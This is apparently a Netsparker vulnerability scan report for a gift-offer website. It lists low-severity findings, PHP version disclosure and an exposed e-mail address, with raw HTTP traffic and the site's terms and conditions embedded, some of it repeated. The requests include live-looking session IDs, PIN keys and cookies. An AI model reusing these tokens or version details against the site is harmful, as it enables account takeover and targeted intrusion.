<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent the Program</li>
<li>signing up for and immediately cancelling multiple offers</li>
<li>purchasing referrals or paying third party�s to complete Sponsor Offers;</li>
<li>participating in any organized system of individuals or �conga line� trying to obtain referrals to qualify for a Gift;</li>
<li>posting your Refer-a-Friend link in search engines and places where it is not welcome or spamming your link online in any capacity;</li>
<li>acting against the business interests or reputation of the Company; </li>
<li>otherwise acting unlawfully in relationship to the Company, the Site or the Program; and/or</li>
<li>any other reason at the sole discretion of the Company. </li>
</ul>
<p>If your account is terminated by Company, you may not re-enroll or join under a new account without Company&rsquo;s prior written authorization.</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">6. RELATIONSHIP WITH SPONSORS.</font></b></p>
<!--header:end-->

<p>Participating Sponsors are independent third parties and the Company is not acting as a principal, agent or broker with respect to any Sponsors. When you complete a Sponsor Offer, your relationship with any such Sponsor is solely between you and the Sponsor. The terms and conditions associated with each Sponsor Offer (as opposed to the terms and conditions of the Program described herein) are determined by the applicable Sponsor, and are subject to change in the applicable Sponsor&rsquo;s sole discretion. You agree not to hold the Company or its officers, directors or employees liable for any loss or damage of any sort incurred as the result of any such dealings or as the result of the content provided by such Sponsors through the Program. </p>


<p class="headline_txt"><b><font size="+1">7. OTHER APPLICABLE TERMS AND CONDITIONS</font></b></p>
<!--header:end-->
<..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://your-gift-zone.com/

Extracted Version

PHP/5.0.4

Request

GET / HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 302 Found
Date: Wed, 27 Apr 2011 14:53:13 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82dd91ce24p10;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Location: /rd_p?p=207753&t=14843
Connection: close
Content-Type: text/html


E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /info.htm

/info.htm

http://your-gift-zone.com/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7c..

Found E-mails

dca@dca.ca.gov

Request

GET /info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: promo_name_cookie=2192name; c_user_pin_id=200492244; c_pin_key=706853; c_email_key=063756462f49f8c46ec5bc4e60bb02b1
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 14:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db82dda41e640vw;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,gift_cookie=29617;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/t/10142/customer_service_vsib.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/t/10142/giftstatus_vsib3.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->

<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $250 in McDonald's Arch Cards, you must complete a <i>total</i> of 6 offers as follows: <b>Page 1 (Silver) - complete any 2 offers; Page 2 (Gold) - complete any 2 offers; Page 3 (Platinum) - complete any 2 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent the Program</li>
<li>signing up for and immediately cancelling multiple offers</li>
<li>purchasing referrals or paying third party�s to complete Sponsor Offers;</li>
<li>participating in any organized system of individuals or �conga line� trying to obtain referrals to qualify for a Gift;</li>
<li>posting your Refer-a-Friend link in search engines and places where it is not welcome or spamming your link online in any capacity;</li>
<li>acting against the business interests or reputation of the Company; </li>
<li>otherwise acting unlawfully in relationship to the Company, the Site or the Program; and/or</li>
<li>any other reason at the sole discretion of the Company. </li>
</ul>
<p>If your account is terminated by Company, you may not re-enroll or join under a new account without Company&rsquo;s prior written authorization.</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">6. RELATIONSHIP WITH SPONSORS.</font></b></p>
<!--header:end-->

<p>Participating Sponsors are independent third parties and the Company is not acting as a principal, agent or broker with respect to any Sponsors. When you complete a Sponsor Offer, your relationship with any such Sponsor is solely between you and the Sponsor. The terms and conditions associated with each Sponsor Offer (as opposed to the terms and conditions of the Program described herein) are determined by the applicable Sponsor, and are subject to change in the applicable Sponsor&rsquo;s sole discretion. You agree not to hold the Company or its officers, directors or employees liable for any loss or damage of any sort incurred as the result of any such dealings or as the result of the content provided by such Sponsors through the Program. </p>


<p class="headline_txt"><b><font size="+1">7. OTHER APPLICABLE TERMS AND CONDITIONS</font></b></p>
<!--header:end-->
<..